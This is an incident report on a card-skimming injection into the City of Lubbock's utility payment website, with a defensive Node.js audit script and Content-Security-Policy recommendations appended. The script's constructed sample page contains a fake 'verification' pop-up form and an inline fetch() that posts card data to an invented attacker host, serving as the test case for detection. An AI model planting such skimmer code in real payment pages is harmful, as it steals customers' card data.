Full Report
At least 12,000 people in Texas had sensitive financial information stolen by hackers who secretly implanted malicious code into the utility payment website of the City of Lubbock.
Analysis Summary
# Incident Report: City of Lubbock Utility Payment Website Skimming Attack
## Executive Summary
Hackers successfully implanted malicious code into the City of Lubbock's third-party hosted utility payment website, leading to the theft of financial details from at least 12,000 customers. The attack utilized an e-skimmer technique via a fake pop-up window, operating between December 18, 2024, and January 6, 2025. The incident highlights risks associated with third-party vendor security in public-facing payment systems.
## Incident Details
- Discovery Date: January 6, 2025
- Incident Date: December 18, 2024 – January 6, 2025
- Affected Organization: City of Lubbock (COLU) Utility Payment System
- Sector: Local Government / Utilities
- Geography: Lubbock, Texas, USA (Victims nationwide)
## Timeline of Events
### Initial Access
- Date/Time: On or around December 18, 2024
- Vector: Compromise/Injection into the third-party hosted utility payment website.
- Details: A malicious actor created a fake pop-up window on the legitimate City of Lubbock Utilities (COLU) payment website, designed to harvest customer input.
### Lateral Movement
- Not reported. The compromise was confined to the vendor-hosted payment front end; no intrusion into the city's internal network has been reported.
### Data Exfiltration/Impact
- Data exfiltrated included names, billing addresses, payment card numbers (PAN), CVVs, and expiration dates from customers who entered information into the fake pop-up.
- Affected timeframe: Utility payments (water, wastewater, storm water, solid waste) made between December 18, 2024, and January 6, 2025.
### Detection & Response
- Detection: City officials discovered the malicious pop-up window on January 6, 2025.
- Response actions: Notification letters were sent to affected customers across the country. Payments submitted during the window were processed without delay, but any card data entered into the fake pop-up during that period is treated as compromised.
## Attack Methodology
- Initial Access: Injection of malicious code (e-skimmer) onto the third-party hosted e-commerce payment page.
- Persistence: The malicious code remained active within the payment interface script until detected.
- Privilege Escalation: Not applicable/Not reported (attack focused on data capture, not internal network access).
- Defense Evasion: The fake pop-up was rendered on the legitimate COLU domain, at the point in the payment flow where a card prompt is expected, so customers had no visible cue (URL, certificate, page layout) that the form was not the vendor's.
- Credential Access: Direct capture of payment card details (PAN, CVV, Expiration Date) as they were entered by users.
- Discovery: Not reported (any reconnaissance of the payment portal front end by the attacker was not described).
- Lateral Movement: Contained within the web application layer; no internal network movement reported.
- Collection: Data collected via input fields on the fake pop-up window.
- Exfiltration: Implied exfiltration of captured payment card data (details not provided).
- Impact: Financial data theft.
## Impact Assessment
- Financial: Costs include breach notification, investigation, and potential liability from card schemes. (Specific costs not disclosed).
- Data Breach: Payment card data (PAN, CVV, expiration date) and PII (name, billing address) for 12,503 individuals (publicly reported as "at least 12,000").
- Operational: No delay in utility payments was reported.
- Reputational: Negative impact due to publicly reported data breach involving municipal utilities.
## Indicators of Compromise
- Network indicators: Not published. A skimmer has to send captured card data to an attacker-controlled endpoint, but no domain, IP address, or beacon format was reported.
- File indicators: Not published; the artifact is the injected script and markup that rendered the fake pop-up on the payment page.
- Behavioral indicators: Unsolicited pop-up window appearing during the known payment workflow on COLU’s utility portal.
## Response Actions
- Containment measures: Removal or disabling of the malicious code/pop-up window on the payment website after detection on January 6, 2025.
- Eradication steps: Identification and closure of the path the attacker used to inject the script. Because the site is vendor-hosted, this remediation would fall to the third-party platform; the report gives no detail on it.
- Recovery actions: Notification of affected parties and monitoring of payment systems.
## Lessons Learned
- The reliance on a third-party vendor for public-facing payment infrastructure introduces significant security risk if oversight is insufficient.
- E-skimming/Magecart-style attacks remain a highly effective way to harvest card data: the skimmer runs in the customer's browser and exfiltrates from there, so it never has to cross the merchant's or vendor's network perimeter and is invisible to perimeter controls.
- The incident demonstrates a critical gap in real-time monitoring of front-end code integrity for payment processing gateways.
## Recommendations
- Immediately conduct a comprehensive security audit and forensic review of the third-party payment processor.
- Implement Content Security Policy (CSP) headers that restrict script-src to the first party and the payment processor (no 'unsafe-inline'), restrict form-action and connect-src to the same origins, and require Subresource Integrity hashes on third-party scripts, so an injected pop-up or skimmer script can neither execute nor exfiltrate.
- Increase real-time monitoring and anomaly detection focused on the structure and behavior of checkout/payment forms on all public web applications.
- Re-evaluate the vendor contract to include stringent, auditable security mandates for payment processing.
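The CSP and checkout-form monitoring recommendations above, as an added example that is not code from the City of Lubbock, its vendor, or the original report: a Node.js script that statically audits a payment page's HTML for scripts outside an allowlist, third-party scripts without Subresource Integrity, inline scripts that contact foreign origins, and card-collecting forms that submit off-origin, and then emits the strict Content-Security-Policy header that would block the same injections at runtime. The page origin, the script allowlist, and the sample HTML (including the skimmer-style "verification" pop-up) are all constructed for the example; the hostnames are assumptions, not indicators from the incident.

```javascript
// Added example, not code from the City of Lubbock, its vendor, or the report.
// Static audit of a payment page for e-skimmer indicators, plus the strict CSP
// header that would block the same injections in the browser.
// PAGE_ORIGIN, ALLOWED_SCRIPT_HOSTS and SAMPLE_PAGE are assumptions.

const PAGE_ORIGIN = 'https://pay.example-utility.gov';   // assumed portal origin
const ALLOWED_SCRIPT_HOSTS = new Set([                    // assumed script allowlist
  'pay.example-utility.gov',                              // first party
  'js.example-psp.com',                                   // payment processor SDK
]);
const CARD_FIELD = /card|cvv|cvc|expir/i;                 // extend with the real field names

function hostOf(url) { try { return new URL(url, PAGE_ORIGIN).hostname; } catch { return null; } }
function originOf(url) { try { return new URL(url, PAGE_ORIGIN).origin; } catch { return null; } }
function attr(attrs, name) {
  const m = attrs.match(new RegExp('\\b' + name + '\\s*=\\s*["\']([^"\']*)["\']', 'i'));
  return m ? m[1] : null;
}

// Every <script>: external ones are checked against the allowlist and for SRI,
// inline ones are flagged outright and scanned for URLs on foreign origins.
function auditScripts(html) {
  const findings = [];
  for (const m of html.matchAll(/<script\b([^>]*)>([\s\S]*?)<\/script>/gi)) {
    const [, attrs, body] = m;
    const src = attr(attrs, 'src');
    if (src) {
      const host = hostOf(src);
      if (!ALLOWED_SCRIPT_HOSTS.has(host)) {
        findings.push({ type: 'unexpected-script-host', detail: src });
      } else if (host !== hostOf('/') && attr(attrs, 'integrity') === null) {
        // a third-party script without an SRI hash can be swapped upstream unnoticed
        findings.push({ type: 'third-party-script-without-sri', detail: src });
      }
      continue;
    }
    const code = body.trim();
    if (!code) continue;
    findings.push({ type: 'inline-script', detail: code.slice(0, 60) });
    for (const url of code.match(/https?:\/\/[^\s'"`)]+/g) || []) {
      if (originOf(url) !== PAGE_ORIGIN && !ALLOWED_SCRIPT_HOSTS.has(hostOf(url))) {
        findings.push({ type: 'inline-script-contacts-foreign-origin', detail: url });
      }
    }
  }
  return findings;
}

// Any form that collects card fields must submit to the page's own origin.
function auditForms(html) {
  const findings = [];
  for (const m of html.matchAll(/<form\b([^>]*)>([\s\S]*?)<\/form>/gi)) {
    const [, attrs, body] = m;
    const names = [...body.matchAll(/<input\b[^>]*?\bname\s*=\s*["']([^"']+)["']/gi)].map(x => x[1]);
    if (!names.some(n => CARD_FIELD.test(n))) continue;
    const action = attr(attrs, 'action') || '';
    if (originOf(action) !== PAGE_ORIGIN) {
      findings.push({ type: 'card-form-foreign-action', detail: action });
    }
  }
  return findings;
}

function auditPage(html) { return [...auditScripts(html), ...auditForms(html)]; }

// The header that enforces the same rules in the browser.
function buildCsp() {
  const scriptHosts = [...ALLOWED_SCRIPT_HOSTS].map(h => `https://${h}`).join(' ');
  return [
    "default-src 'self'",
    `script-src ${scriptHosts}`,                      // no 'unsafe-inline': an injected inline skimmer does not run
    "connect-src 'self' https://js.example-psp.com",  // fetch/XHR beacons to other origins are blocked (assumed PSP host)
    "form-action 'self'",                             // forms cannot post to a foreign host
    "frame-ancestors 'none'",
    "object-src 'none'",
    'report-uri /csp-report',                         // blocked injections show up as violation reports
  ].join('; ');
}

// Constructed sample: a legitimate checkout form plus an injected "verification"
// pop-up that posts card data to an attacker host (all hostnames invented).
const SAMPLE_PAGE = `
<script src="/js/checkout.js"></script>
<script src="https://js.example-psp.com/v1/tokenize.js" integrity="sha384-AAAA"></script>
<script src="https://cdn-assets.example/jquery.min.js"></script>
<form action="/pay" method="post"><input name="account_number"><input name="amount"></form>
<div id="verify-modal" style="display:none">
  <form action="https://secure-verify.example/collect" method="post">
    <input name="cardNumber"><input name="cvv"><input name="expiry">
  </form>
</div>
<script>
  document.getElementById('verify-modal').style.display = 'block';
  fetch('https://secure-verify.example/c', { method: 'POST', body: JSON.stringify(cardData) });
</script>`;

console.log(JSON.stringify(auditPage(SAMPLE_PAGE), null, 2));
console.log('Content-Security-Policy: ' + buildCsp());
```

Run against a snapshot of the live checkout page on a schedule, an audit like this catches the static form of the injection; a pop-up that is created purely at runtime needs the same checks applied in the browser (a MutationObserver watching for new forms and inputs with card-like names) or, more simply, the CSP above, whose violation reports are the alert.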